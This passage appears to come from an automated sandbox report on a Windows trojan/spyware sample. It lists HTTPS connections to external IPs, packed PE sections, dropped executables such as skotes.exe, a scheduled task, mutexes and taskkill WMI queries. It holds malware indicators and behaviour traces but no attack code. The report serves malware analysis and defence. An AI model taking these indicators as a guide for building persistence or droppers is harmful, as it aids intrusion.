                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50087 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50008 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50395 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50154 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50402
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50404
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50142 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50406
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50400
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50178 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50210 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49730 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49742 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49820 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49833 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49839 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49847 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49855 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49863 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49866 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49874 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49895 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49912 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49917 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49924 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49929 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49942 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49954 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49970 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49993 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:50003 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50015 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50025 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50046 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50057 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:50082 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50087 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50088 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50089 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.4:50091 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.4:50094 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50100 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50106 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50107 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50108 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50109 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50110 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:50111 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50121 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50128 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50136 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50147 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50154 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50162 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50167 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50178 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:50185 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50194 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50196 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50195 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.4:50210 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.4:50219 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 40.126.32.140:443 -> 192.168.2.4:50235 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.42.65.92:443 -> 192.168.2.4:50244 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 20.42.65.94:443 -> 192.168.2.4:50289 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50301 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50299 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50302 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.4:50300 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50373 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50375 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50377 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50380 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50382 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50383 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50386 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50387 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50390 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50392 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50395 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50398 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50400 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50402 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50404 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:50413 version: TLS 1.2

                          System Summary

                          barindex
                          Source: aca7749dee.exe, 0000000C.00000000.2743259992.0000000000BE2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8a5638ed-5
                          Source: aca7749dee.exe, 0000000C.00000000.2743259992.0000000000BE2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e2bdc3dd-1
                          Source: aca7749dee.exe, 00000024.00000000.2899989600.0000000000BE2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_20e5864a-b
                          Source: aca7749dee.exe, 00000024.00000000.2899989600.0000000000BE2000.00000002.00000001.01000000.0000000C.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_71bc63e3-3
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeFile dump: service123.exe.8.dr 314617856Jump to dropped file
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: file.exeStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .rsrc
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: 159c892ab5.exe.6.drStatic PE information: section name:
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: .rsrc
                          Source: 159c892ab5.exe.6.drStatic PE information: section name: .idata
                          Source: 159c892ab5.exe.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name:
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name: .idata
                          Source: 7b9f3f6834.exe.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: random[1].exe1.6.drStatic PE information: section name: .idata
                          Source: random[1].exe1.6.drStatic PE information: section name:
                          Source: a78a39a396.exe.6.drStatic PE information: section name:
                          Source: a78a39a396.exe.6.drStatic PE information: section name: .idata
                          Source: a78a39a396.exe.6.drStatic PE information: section name:
                          Source: random[2].exe.6.drStatic PE information: section name:
                          Source: random[2].exe.6.drStatic PE information: section name: .idata
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name:
                          Source: 76dd304e1d.exe.6.drStatic PE information: section name: .idata
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name:
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name: .idata
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: section name:
                          Source: random[2].exe.10.drStatic PE information: section name:
                          Source: random[2].exe.10.drStatic PE information: section name: .idata
                          Source: random[2].exe.10.drStatic PE information: section name:
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                          Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exeStatic PE information: Section: ZLIB complexity 0.9978659315395095
                          Source: file.exeStatic PE information: Section: zbdrpywl ZLIB complexity 0.9945464383353585
                          Source: skotes.exe.0.drStatic PE information: Section: ZLIB complexity 0.9978659315395095
                          Source: skotes.exe.0.drStatic PE information: Section: zbdrpywl ZLIB complexity 0.9945464383353585
                          Source: random[1].exe.6.drStatic PE information: Section: odbfcxsw ZLIB complexity 0.9947417996453901
                          Source: 159c892ab5.exe.6.drStatic PE information: Section: odbfcxsw ZLIB complexity 0.9947417996453901
                          Source: random[1].exe0.6.drStatic PE information: Section: ZLIB complexity 0.9974796307755776
                          Source: random[1].exe0.6.drStatic PE information: Section: waxfszwi ZLIB complexity 0.9944243636960327
                          Source: 7b9f3f6834.exe.6.drStatic PE information: Section: ZLIB complexity 0.9974796307755776
                          Source: 7b9f3f6834.exe.6.drStatic PE information: Section: waxfszwi ZLIB complexity 0.9944243636960327
                          Source: random[1].exe1.6.drStatic PE information: Section: swacraub ZLIB complexity 0.9948864709214501
                          Source: a78a39a396.exe.6.drStatic PE information: Section: swacraub ZLIB complexity 0.9948864709214501
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: Section: ZLIB complexity 0.9978659315395095
                          Source: DocumentsCFCGIIEHIE.exe.10.drStatic PE information: Section: zbdrpywl ZLIB complexity 0.9945464383353585
                          Source: random[2].exe.10.drStatic PE information: Section: ZLIB complexity 0.9978659315395095
                          Source: random[2].exe.10.drStatic PE information: Section: zbdrpywl ZLIB complexity 0.9945464383353585
                          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@138/68@97/24
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3748:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeMutant created: NULL
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8180:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3740:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2088:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4856:120:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeMutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:64:WilError_03
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:64:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7988:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3672:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_03
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\abc3bc1985Jump to behavior
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                          Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
